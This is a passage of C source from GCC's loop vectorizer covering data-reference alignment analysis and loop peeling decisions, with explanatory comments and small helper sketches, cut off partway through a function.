/* If this is a backward-running DR, then the first access in the larger
vectype actually is N-1 elements before the address recorded in the DR.
Adjust misalign accordingly. */
if (tree_int_cst_sgn (DR_STEP (dr)) < 0)
{
tree offset = ssize_int (TYPE_VECTOR_SUBPARTS (vectype) - 1);
/* DR_STEP(dr) is the same as -TYPE_SIZE of the scalar type,
otherwise we wouldn't be here. */
offset = fold_build2 (MULT_EXPR, ssizetype, offset, DR_STEP (dr));
/* PLUS because DR_STEP was negative. */
misalign = size_binop (PLUS_EXPR, misalign, offset);
}
SET_DR_MISALIGNMENT (dr,
wi::mod_floor (misalign, alignment, SIGNED).to_uhwi ());
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"misalign = %d bytes of ref ", DR_MISALIGNMENT (dr));
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, ref);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return true;
}
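/* Plain-C sketch of the final misalignment computation above: the byte
   offset is folded into [0, ALIGN) with floor semantics, mirroring
   wi::mod_floor, so a negative offset from a backward-running access
   still yields a valid misalignment.  */
static inline unsigned int
example_misalignment (long offset_bytes, unsigned int align)
{
  long m = offset_bytes % (long) align;
  return (unsigned int) (m < 0 ? m + (long) align : m);
}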
/* Function vect_compute_data_refs_alignment
Compute the misalignment of data references in the loop.
Return FALSE if a data reference is found that cannot be vectorized. */
static bool
vect_compute_data_refs_alignment (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo)
{
vec<data_reference_p> datarefs;
struct data_reference *dr;
unsigned int i;
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
FOR_EACH_VEC_ELT (datarefs, i, dr)
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr)))
&& !vect_compute_data_ref_alignment (dr))
{
if (bb_vinfo)
{
/* Mark unsupported statement as unvectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
continue;
}
else
return false;
}
return true;
}
/* Function vect_update_misalignment_for_peel
DR - the data reference whose misalignment is to be adjusted.
DR_PEEL - the data reference whose misalignment is being made
zero in the vector loop by the peel.
NPEEL - the number of iterations in the peel loop if the misalignment
of DR_PEEL is known at compile time. */
static void
vect_update_misalignment_for_peel (struct data_reference *dr,
struct data_reference *dr_peel, int npeel)
{
unsigned int i;
vec<dr_p> same_align_drs;
struct data_reference *current_dr;
int dr_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr))));
int dr_peel_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr_peel))));
stmt_vec_info stmt_info = vinfo_for_stmt (DR_STMT (dr));
stmt_vec_info peel_stmt_info = vinfo_for_stmt (DR_STMT (dr_peel));
/* For interleaved data accesses the step in the loop must be multiplied by
the size of the interleaving group. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
dr_size *= GROUP_SIZE (vinfo_for_stmt (GROUP_FIRST_ELEMENT (stmt_info)));
if (STMT_VINFO_GROUPED_ACCESS (peel_stmt_info))
dr_peel_size *= GROUP_SIZE (peel_stmt_info);
/* It can be assumed that the data refs with the same alignment as dr_peel
are aligned in the vector loop. */
same_align_drs
= STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (DR_STMT (dr_peel)));
FOR_EACH_VEC_ELT (same_align_drs, i, current_dr)
{
if (current_dr != dr)
continue;
gcc_assert (DR_MISALIGNMENT (dr) / dr_size ==
DR_MISALIGNMENT (dr_peel) / dr_peel_size);
SET_DR_MISALIGNMENT (dr, 0);
return;
}
if (known_alignment_for_access_p (dr)
&& known_alignment_for_access_p (dr_peel))
{
bool negative = tree_int_cst_compare (DR_STEP (dr), size_zero_node) < 0;
int misal = DR_MISALIGNMENT (dr);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
misal += negative ? -npeel * dr_size : npeel * dr_size;
misal &= (TYPE_ALIGN (vectype) / BITS_PER_UNIT) - 1;
SET_DR_MISALIGNMENT (dr, misal);
return;
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location, "Setting misalignment to -1.\n");
SET_DR_MISALIGNMENT (dr, -1);
}
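/* Plain-C sketch of the known-alignment branch above: advance the
   misalignment by NPEEL elements (in the direction of DR_STEP) and wrap
   it to the vector alignment.  ALIGN must be a power of two, as vector
   alignments are.  */
static inline int
example_misalignment_after_peel (int misal, int npeel, int dr_size,
                                 int align, int negative_step)
{
  misal += negative_step ? -npeel * dr_size : npeel * dr_size;
  return misal & (align - 1);
}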
/* Function vect_verify_datarefs_alignment
Return TRUE if all data references in the loop can be
handled with respect to alignment. */
bool
vect_verify_datarefs_alignment (loop_vec_info loop_vinfo, bb_vec_info bb_vinfo)
{
vec<data_reference_p> datarefs;
struct data_reference *dr;
enum dr_alignment_support supportable_dr_alignment;
unsigned int i;
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
if (!STMT_VINFO_RELEVANT_P (stmt_info))
continue;
/* For interleaving, only the alignment of the first access matters.
Skip statements marked as not vectorizable. */
if ((STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
|| !STMT_VINFO_VECTORIZABLE (stmt_info))
continue;
/* Strided loads perform only component accesses, alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
if (!supportable_dr_alignment)
{
if (dump_enabled_p ())
{
if (DR_IS_READ (dr))
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unsupported unaligned load.");
else
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unsupported unaligned "
"store.");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dr));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
if (supportable_dr_alignment != dr_aligned && dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Vectorizing an unaligned access.\n");
}
return true;
}
/* Given a memory reference EXP, return whether its alignment is less
than its size. */
static bool
not_size_aligned (tree exp)
{
if (!tree_fits_uhwi_p (TYPE_SIZE (TREE_TYPE (exp))))
return true;
return (tree_to_uhwi (TYPE_SIZE (TREE_TYPE (exp)))
> get_object_alignment (exp));
}
/* Function vector_alignment_reachable_p
Return true if vector alignment for DR is reachable by peeling
a few loop iterations. Return false otherwise. */
static bool
vector_alignment_reachable_p (struct data_reference *dr)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
{
/* For interleaved accesses we peel only if the number of iterations in
the prolog loop (VF - misalignment) is a multiple of the number of
interleaved accesses. */
int elem_size, mis_in_elements;
int nelements = TYPE_VECTOR_SUBPARTS (vectype);
/* FORNOW: handle only known alignment. */
if (!known_alignment_for_access_p (dr))
return false;
elem_size = GET_MODE_SIZE (TYPE_MODE (vectype)) / nelements;
mis_in_elements = DR_MISALIGNMENT (dr) / elem_size;
if ((nelements - mis_in_elements) % GROUP_SIZE (stmt_info))
return false;
}
/* If the misalignment is known at compile time, allow peeling only if
natural alignment is reachable through peeling. */
if (known_alignment_for_access_p (dr) && !aligned_access_p (dr))
{
HOST_WIDE_INT elmsize =
int_cst_value (TYPE_SIZE_UNIT (TREE_TYPE (vectype)));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"data size =" HOST_WIDE_INT_PRINT_DEC, elmsize);
dump_printf (MSG_NOTE,
". misalignment = %d.\n", DR_MISALIGNMENT (dr));
}
if (DR_MISALIGNMENT (dr) % elmsize)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"data size does not divide the misalignment.\n");
return false;
}
}
if (!known_alignment_for_access_p (dr))
{
tree type = TREE_TYPE (DR_REF (dr));
bool is_packed = not_size_aligned (DR_REF (dr));
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Unknown misalignment, is_packed = %d\n",is_packed);
if ((TYPE_USER_ALIGN (type) && !is_packed)
|| targetm.vectorize.vector_alignment_reachable (type, is_packed))
return true;
else
return false;
}
return true;
}
/* Calculate the cost of the memory access represented by DR. */
static void
vect_get_data_access_cost (struct data_reference *dr,
unsigned int *inside_cost,
unsigned int *outside_cost,
stmt_vector_for_cost *body_cost_vec)
{
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
int nunits = TYPE_VECTOR_SUBPARTS (STMT_VINFO_VECTYPE (stmt_info));
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
int vf = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
int ncopies = vf / nunits;
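/* For example: with a vectorization factor of 8 and V4SI accesses
(nunits = 4), each scalar access expands to ncopies = 2 vector
accesses per vector iteration. */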
if (DR_IS_READ (dr))
vect_get_load_cost (dr, ncopies, true, inside_cost, outside_cost,
NULL, body_cost_vec, false);
else
vect_get_store_cost (dr, ncopies, inside_cost, body_cost_vec);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"vect_get_data_access_cost: inside_cost = %d, "
"outside_cost = %d.\n", *inside_cost, *outside_cost);
}
/* Insert DR into peeling hash table with NPEEL as key. */
static void
vect_peeling_hash_insert (loop_vec_info loop_vinfo, struct data_reference *dr,
int npeel)
{
struct _vect_peel_info elem, *slot;
_vect_peel_info **new_slot;
bool supportable_dr_alignment = vect_supportable_dr_alignment (dr, true);
elem.npeel = npeel;
slot = LOOP_VINFO_PEELING_HTAB (loop_vinfo)->find (&elem);
if (slot)
slot->count++;
else
{
slot = XNEW (struct _vect_peel_info);
slot->npeel = npeel;
slot->dr = dr;
slot->count = 1;
new_slot
= LOOP_VINFO_PEELING_HTAB (loop_vinfo)->find_slot (slot, INSERT);
*new_slot = slot;
}
if (!supportable_dr_alignment
&& unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
slot->count += VECT_MAX_COST;
}
/* Traverse the peeling hash table to find the peeling option that aligns
the maximum number of data accesses. */
int
vect_peeling_hash_get_most_frequent (_vect_peel_info **slot,
_vect_peel_extended_info *max)
{
vect_peel_info elem = *slot;
if (elem->count > max->peel_info.count
|| (elem->count == max->peel_info.count
&& max->peel_info.npeel > elem->npeel))
{
max->peel_info.npeel = elem->npeel;
max->peel_info.count = elem->count;
max->peel_info.dr = elem->dr;
}
return 1;
}
/* Traverse peeling hash table and calculate cost for each peeling option.
Find the one with the lowest cost. */
int
vect_peeling_hash_get_lowest_cost (_vect_peel_info **slot,
_vect_peel_extended_info *min)
{
vect_peel_info elem = *slot;
int save_misalignment, dummy;
unsigned int inside_cost = 0, outside_cost = 0, i;
gimple stmt = DR_STMT (elem->dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
vec<data_reference_p> datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
struct data_reference *dr;
stmt_vector_for_cost prologue_cost_vec, body_cost_vec, epilogue_cost_vec;
int single_iter_cost;
prologue_cost_vec.create (2);
body_cost_vec.create (2);
epilogue_cost_vec.create (2);
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
save_misalignment = DR_MISALIGNMENT (dr);
vect_update_misalignment_for_peel (dr, elem->dr, elem->npeel);
vect_get_data_access_cost (dr, &inside_cost, &outside_cost,
&body_cost_vec);
SET_DR_MISALIGNMENT (dr, save_misalignment);
}
single_iter_cost = vect_get_single_scalar_iteration_cost (loop_vinfo);
outside_cost += vect_get_known_peeling_cost
(loop_vinfo, elem->npeel, &dummy,
/* ??? We use this cost as number of stmts with scalar_stmt cost,
thus divide by that. This introduces rounding errors, thus better
introduce a new cost kind (raw_cost? scalar_iter_cost?). */
single_iter_cost / vect_get_stmt_cost (scalar_stmt),
&prologue_cost_vec, &epilogue_cost_vec);
/* Prologue and epilogue costs are added to the target model later.
These costs depend only on the scalar iteration cost, the
number of peeling iterations finally chosen, and the number of
misaligned statements. So discard the information found here. */
prologue_cost_vec.release ();
epilogue_cost_vec.release ();
if (inside_cost < min->inside_cost
|| (inside_cost == min->inside_cost && outside_cost < min->outside_cost))
{
min->inside_cost = inside_cost;
min->outside_cost = outside_cost;
min->body_cost_vec.release ();
min->body_cost_vec = body_cost_vec;
min->peel_info.dr = elem->dr;
min->peel_info.npeel = elem->npeel;
}
else
body_cost_vec.release ();
return 1;
}
/* Choose best peeling option by traversing peeling hash table and either
choosing an option with the lowest cost (if cost model is enabled) or the
option that aligns as many accesses as possible. */
static struct data_reference *
vect_peeling_hash_choose_best_peeling (loop_vec_info loop_vinfo,
unsigned int *npeel,
stmt_vector_for_cost *body_cost_vec)
{
struct _vect_peel_extended_info res;
res.peel_info.dr = NULL;
res.body_cost_vec = stmt_vector_for_cost ();
if (!unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
{
res.inside_cost = INT_MAX;
res.outside_cost = INT_MAX;
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
->traverse <_vect_peel_extended_info *,
vect_peeling_hash_get_lowest_cost> (&res);
}
else
{
res.peel_info.count = 0;
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
->traverse <_vect_peel_extended_info *,
vect_peeling_hash_get_most_frequent> (&res);
}
*npeel = res.peel_info.npeel;
*body_cost_vec = res.body_cost_vec;
return res.peel_info.dr;
}
/* Function vect_enhance_data_refs_alignment
This pass will use loop versioning and loop peeling in order to enhance
the alignment of data references in the loop.
FOR NOW: we assume that whatever versioning/peeling takes place, only the
original loop is to be vectorized. Any other loops that are created by
the transformations performed in this pass are not supposed to be
vectorized. This restriction will be relaxed.
This pass will require a cost model to guide it whether to apply peeling
or versioning or a combination of the two. For example, the scheme that
Intel uses when given a loop with several memory accesses is as follows:
choose one memory access ('p') whose alignment you want to force by doing
peeling. Then, either (1) generate a loop in which 'p' is aligned and all
other accesses are not necessarily aligned, or (2) use loop versioning to
generate one loop in which all accesses are aligned, and another loop in
which only 'p' is necessarily aligned.
("Automatic Intra-Register Vectorization for the Intel Architecture",
Aart J.C. Bik, Milind Girkar, Paul M. Grey and Xinmin Tian, International
Journal of Parallel Programming, Vol. 30, No. 2, April 2002.)
Devising a cost model is the most critical aspect of this work. It will
guide us on which access to peel for, whether to use loop versioning, how
many versions to create, etc. The cost model will probably consist of
generic considerations as well as target specific considerations (on
powerpc for example, misaligned stores are more painful than misaligned
loads).
Here are the general steps involved in alignment enhancements:
-- original loop, before alignment analysis:
for (i=0; i<N; i++){
x = q[i]; # DR_MISALIGNMENT(q) = unknown
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- After vect_compute_data_refs_alignment:
for (i=0; i<N; i++){
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- Possibility 1: we do loop versioning:
if (p is aligned) {
for (i=0; i<N; i++){ # loop 1A
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = 0
}
}
else {
for (i=0; i<N; i++){ # loop 1B
x = q[i]; # DR_MISALIGNMENT(q) = 3
p[i] = y; # DR_MISALIGNMENT(p) = unaligned
}
}
-- Possibility 2: we do loop peeling:
for (i = 0; i < 3; i++){ # (scalar loop, not to be vectorized).
x = q[i];
p[i] = y;
}
for (i = 3; i < N; i++){ # loop 2A
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = unknown
}
-- Possibility 3: combination of loop peeling and versioning:
for (i = 0; i < 3; i++){ # (scalar loop, not to be vectorized).
x = q[i];
p[i] = y;
}
if (p is aligned) {
for (i = 3; i<N; i++){ # loop 3A
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = 0
}
}
else {
for (i = 3; i<N; i++){ # loop 3B
x = q[i]; # DR_MISALIGNMENT(q) = 0
p[i] = y; # DR_MISALIGNMENT(p) = unaligned
}
}
These loops are later passed to loop_transform to be vectorized. The
vectorizer will use the alignment information to guide the transformation
(whether to generate regular loads/stores, or with special handling for
misalignment). */
bool
vect_enhance_data_refs_alignment (loop_vec_info loop_vinfo)
{
vec<data_reference_p> datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
enum dr_alignment_support supportable_dr_alignment;
struct data_reference *dr0 = NULL, *first_store = NULL;
struct data_reference *dr;
unsigned int i, j;
bool do_peeling = false;
bool do_versioning = false;
bool stat;
gimple stmt;
stmt_vec_info stmt_info;
unsigned int npeel = 0;
bool all_misalignments_unknown = true;
unsigned int vf = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
unsigned possible_npeel_number = 1;
tree vectype;
unsigned int nelements, mis, same_align_drs_max = 0;
stmt_vector_for_cost body_cost_vec = stmt_vector_for_cost ();
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_enhance_data_refs_alignment ===\n");
/* While cost model enhancements are expected in the future, the high level
view of the code at this time is as follows:
A) If there is a misaligned access then see if peeling to align
this access can make all data references satisfy
vect_supportable_dr_alignment. If so, update data structures
as needed and return true.
B) If peeling wasn't possible and there is a data reference with an
unknown misalignment that does not satisfy vect_supportable_dr_alignment
then see if loop versioning checks can be used to make all data
references satisfy vect_supportable_dr_alignment. If so, update
data structures as needed and return true.
C) If neither peeling nor versioning were successful then return false if
any data reference does not satisfy vect_supportable_dr_alignment.
D) Return true (all data references satisfy vect_supportable_dr_alignment).
Note, Possibility 3 above (which is peeling and versioning together) is not
being done at this time. */
/* (1) Peeling to force alignment. */
/* (1.1) Decide whether to perform peeling, and how many iterations to peel:
Considerations:
+ How many accesses will become aligned due to the peeling
- How many accesses will become unaligned due to the peeling,
and the cost of misaligned accesses.
- The cost of peeling (the extra runtime checks, the increase
in code size). */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
if (!STMT_VINFO_RELEVANT_P (stmt_info))
continue;
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
/* For invariant accesses there is nothing to enhance. */
if (integer_zerop (DR_STEP (dr)))
continue;
/* Strided loads perform only component accesses; alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, true);
do_peeling = vector_alignment_reachable_p (dr);
if (do_peeling)
{
if (known_alignment_for_access_p (dr))
{
unsigned int npeel_tmp;
bool negative = tree_int_cst_compare (DR_STEP (dr),
size_zero_node) < 0;
/* Save info about DR in the hash table. */
if (!LOOP_VINFO_PEELING_HTAB (loop_vinfo))
LOOP_VINFO_PEELING_HTAB (loop_vinfo)
= new hash_table<peel_info_hasher> (1);
vectype = STMT_VINFO_VECTYPE (stmt_info);
nelements = TYPE_VECTOR_SUBPARTS (vectype);
mis = DR_MISALIGNMENT (dr) / GET_MODE_SIZE (TYPE_MODE (
TREE_TYPE (DR_REF (dr))));
npeel_tmp = (negative
? (mis - nelements) : (nelements - mis))
& (nelements - 1);
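/* For example: for V4SI (nelements = 4) and an access misaligned by
one element with a positive step, npeel_tmp = (4 - 1) & 3 = 3 scalar
iterations align it. */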
/* For multiple types, it is possible that the bigger type access
will have more than one peeling option. E.g., a loop with two
types: one of size (vector size / 4), and the other one of
size (vector size / 8). The vectorization factor will be 8. If both
accesses are misaligned by 3, the first one needs one scalar
iteration to be aligned, and the second one needs 5. But the
first one will also be aligned by peeling 5 scalar
iterations, and in that case both accesses will be aligned.
Hence, except for the immediate peeling amount, we also want
to try to add a full vector size, as long as we don't exceed the
vectorization factor.
We do this automatically for the cost model, since we calculate
the cost for every peeling option. */
if (unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
possible_npeel_number = vf / nelements;
/* Handle the aligned case. We may decide to align some other
access, making DR unaligned. */
if (DR_MISALIGNMENT (dr) == 0)
{
npeel_tmp = 0;
if (unlimited_cost_model (LOOP_VINFO_LOOP (loop_vinfo)))
possible_npeel_number++;
}
for (j = 0; j < possible_npeel_number; j++)
{
gcc_assert (npeel_tmp <= vf);
vect_peeling_hash_insert (loop_vinfo, dr, npeel_tmp);
npeel_tmp += nelements;
}
all_misalignments_unknown = false;
/* The data-ref that was chosen for the case that all the
misalignments are unknown is not relevant anymore, since we
have a data-ref with known alignment. */
dr0 = NULL;
}
else
{
/* If we don't know any misalignment values, we prefer
peeling for the data-ref that has the maximum number of data-refs
with the same alignment, unless the target prefers to align
stores over loads. */
if (all_misalignments_unknown)
{
unsigned same_align_drs
= STMT_VINFO_SAME_ALIGN_REFS (stmt_info).length ();
if (!dr0
|| same_align_drs_max < same_align_drs)
{
same_align_drs_max = same_align_drs;
dr0 = dr;
}
/* For data-refs with the same number of related
accesses prefer the one where the misalign
computation will be invariant in the outermost loop. */
else if (same_align_drs_max == same_align_drs)
{
struct loop *ivloop0, *ivloop;
ivloop0 = outermost_invariant_loop_for_expr
(loop, DR_BASE_ADDRESS (dr0));
ivloop = outermost_invariant_loop_for_expr
(loop, DR_BASE_ADDRESS (dr));
if ((ivloop && !ivloop0)
|| (ivloop && ivloop0
&& flow_loop_nested_p (ivloop, ivloop0)))
dr0 = dr;
}
if (!first_store && DR_IS_WRITE (dr))
first_store = dr;
}
/* If there are both known and unknown misaligned accesses in the
loop, we choose the peeling amount according to the known
accesses. */
if (!supportable_dr_alignment)
{
dr0 = dr;
if (!first_store && DR_IS_WRITE (dr))
first_store = dr;
}
}
}
else
{
if (!aligned_access_p (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"vector alignment may not be reachable\n");
break;
}
}
}
/* Check if we can possibly peel the loop. */
if (!vect_can_advance_ivs_p (loop_vinfo)
|| !slpeel_can_duplicate_loop_p (loop, single_exit (loop)))
do_peeling = false;
/* If we don't know how many times the peeling loop will run,
assume it will run VF-1 times and disable peeling if the remaining
iterations are then less than the vectorization factor (e.g., with
VF = 4 we require at least 2 * 4 - 1 = 7 known iterations: up to 3
peeled plus 4 for one full vector iteration). */
if (do_peeling
&& all_misalignments_unknown
&& LOOP_VINFO_NITERS_KNOWN_P (loop_vinfo)
&& (LOOP_VINFO_INT_NITERS (loop_vinfo)
< 2 * (unsigned) LOOP_VINFO_VECT_FACTOR (loop_vinfo) - 1))
do_peeling = false;
if (do_peeling
&& all_misalignments_unknown
&& vect_supportable_dr_alignment (dr0, false))
{
/* Check whether the target prefers stores over loads, i.e., whether
misaligned stores are more expensive than misaligned loads (taking
data-refs with the same alignment into account). */
if (first_store && DR_IS_READ (dr0))
{
unsigned int load_inside_cost = 0, load_outside_cost = 0;
unsigned int store_inside_cost = 0, store_outside_cost = 0;
unsigned int load_inside_penalty = 0, load_outside_penalty = 0;
unsigned int store_inside_penalty = 0, store_outside_penalty = 0;
stmt_vector_for_cost dummy;
dummy.create (2);
vect_get_data_access_cost (dr0, &load_inside_cost, &load_outside_cost,
&dummy);
vect_get_data_access_cost (first_store, &store_inside_cost,
&store_outside_cost, &dummy);
dummy.release ();
/* Calculate the penalty for leaving FIRST_STORE unaligned (by
aligning the load DR0). */
load_inside_penalty = store_inside_cost;
load_outside_penalty = store_outside_cost;
for (i = 0;
STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (
DR_STMT (first_store))).iterate (i, &dr);
i++)
if (DR_IS_READ (dr))
{
load_inside_penalty += load_inside_cost;
load_outside_penalty += load_outside_cost;
}
else
{
load_inside_penalty += store_inside_cost;
load_outside_penalty += store_outside_cost;
}
/* Calculate the penalty for leaving DR0 unaligned (by
aligning the FIRST_STORE). */
store_inside_penalty = load_inside_cost;
store_outside_penalty = load_outside_cost;
for (i = 0;
STMT_VINFO_SAME_ALIGN_REFS (vinfo_for_stmt (
DR_STMT (dr0))).iterate (i, &dr);
i++)
if (DR_IS_READ (dr))
{
store_inside_penalty += load_inside_cost;
store_outside_penalty += load_outside_cost;
}
else
{
store_inside_penalty += store_inside_cost;
store_outside_penalty += store_outside_cost;
}
if (load_inside_penalty > store_inside_penalty
|| (load_inside_penalty == store_inside_penalty
&& load_outside_penalty > store_outside_penalty))
dr0 = first_store;
}
/* In case there are only loads with different unknown misalignments, use
peeling only if it may help to align other accesses in the loop. */
if (!first_store
&& !STMT_VINFO_SAME_ALIGN_REFS (
vinfo_for_stmt (DR_STMT (dr0))).length ()
&& vect_supportable_dr_alignment (dr0, false)
!= dr_unaligned_supported)
do_peeling = false;
}
if (do_peeling && !dr0)
{
/* Peeling is possible, but there is no data access that would be
unsupported when unaligned. So we try to choose the best possible
peeling. */
/* We should get here only if there are drs with known misalignment. */
gcc_assert (!all_misalignments_unknown);
/* Choose the best peeling from the hash table. */
dr0 = vect_peeling_hash_choose_best_peeling (loop_vinfo, &npeel,
&body_cost_vec);
if (!dr0 || !npeel)
do_peeling = false;
/* If peeling by npeel will result in a remaining loop not iterating
enough to be vectorized then do not peel. */
if (do_peeling
&& LOOP_VINFO_NITERS_KNOWN_P (loop_vinfo)
&& (LOOP_VINFO_INT_NITERS (loop_vinfo)
< LOOP_VINFO_VECT_FACTOR (loop_vinfo) + npeel))
do_peeling = false;
}
if (do_peeling)
{
stmt = DR_STMT (dr0);
stmt_info = vinfo_for_stmt (stmt);
vectype = STMT_VINFO_VECTYPE (stmt_info);
nelements = TYPE_VECTOR_SUBPARTS (vectype);
if (known_alignment_for_access_p (dr0))
{
bool negative = tree_int_cst_compare (DR_STEP (dr0),
size_zero_node) < 0;
if (!npeel)
{
/* Since it's known at compile time, compute the number of
iterations in the peeled loop (the peeling factor) for use in
updating DR_MISALIGNMENT values. The peeling factor is the
vectorization factor minus the misalignment as an element
count. */
mis = DR_MISALIGNMENT (dr0);
mis /= GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dr0))));
npeel = ((negative ? mis - nelements : nelements - mis)
& (nelements - 1));
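/* For example: a misalignment of 8 bytes with 4-byte elements gives
mis = 2 elements; with nelements = 4 and a positive step,
npeel = (4 - 2) & 3 = 2 scalar iterations are peeled. */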
}
/* For interleaved data access every iteration accesses all the
members of the group, therefore we divide the number of iterations
by the group size. */
stmt_info = vinfo_for_stmt (DR_STMT (dr0));
if (STMT_VINFO_GROUPED_ACCESS (stmt_info))
npeel /= GROUP_SIZE (stmt_info);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Try peeling by %d\n", npeel);
}
/* Ensure that all data refs can be vectorized after the peel. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
int save_misalignment;
if (dr == dr0)
continue;
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt)
continue;
/* Strided loads perform only component accesses; alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
save_misalignment = DR_MISALIGNMENT (dr);
vect_update_misalignment_for_peel (dr, dr0, npeel);
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
SET_DR_MISALIGNMENT (dr, save_misalignment);
if (!supportable_dr_alignment)
{
do_peeling = false;
break;
}
}
if (do_peeling && known_alignment_for_access_p (dr0) && npeel == 0)
{
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
if (!stat)
do_peeling = false;
else
{
body_cost_vec.release ();
return stat;
}
}
if (do_peeling)
{
unsigned max_allowed_peel
= PARAM_VALUE (PARAM_VECT_MAX_PEELING_FOR_ALIGNMENT);
if (max_allowed_peel != (unsigned)-1)
{
unsigned max_peel = npeel;
if (max_peel == 0)
{
gimple dr_stmt = DR_STMT (dr0);
stmt_vec_info vinfo = vinfo_for_stmt (dr_stmt);
tree vtype = STMT_VINFO_VECTYPE (vinfo);
max_peel = TYPE_VECTOR_SUBPARTS (vtype) - 1;
}
if (max_peel > max_allowed_peel)
{
do_peeling = false;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Disable peeling, max peels reached: %d\n", max_peel);
}
}
}
if (do_peeling)
{
/* (1.2) Update the DR_MISALIGNMENT of each data reference DR_i.
If the misalignment of DR_i is identical to that of dr0 then set
DR_MISALIGNMENT (DR_i) to zero. If the misalignment of DR_i and
dr0 are known at compile time then increment DR_MISALIGNMENT (DR_i)
by the peeling factor times the element size of DR_i (MOD the
vectorization factor times the size). Otherwise, the
misalignment of DR_i must be set to unknown. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
if (dr != dr0)
vect_update_misalignment_for_peel (dr, dr0, npeel);
LOOP_VINFO_UNALIGNED_DR (loop_vinfo) = dr0;
if (npeel)
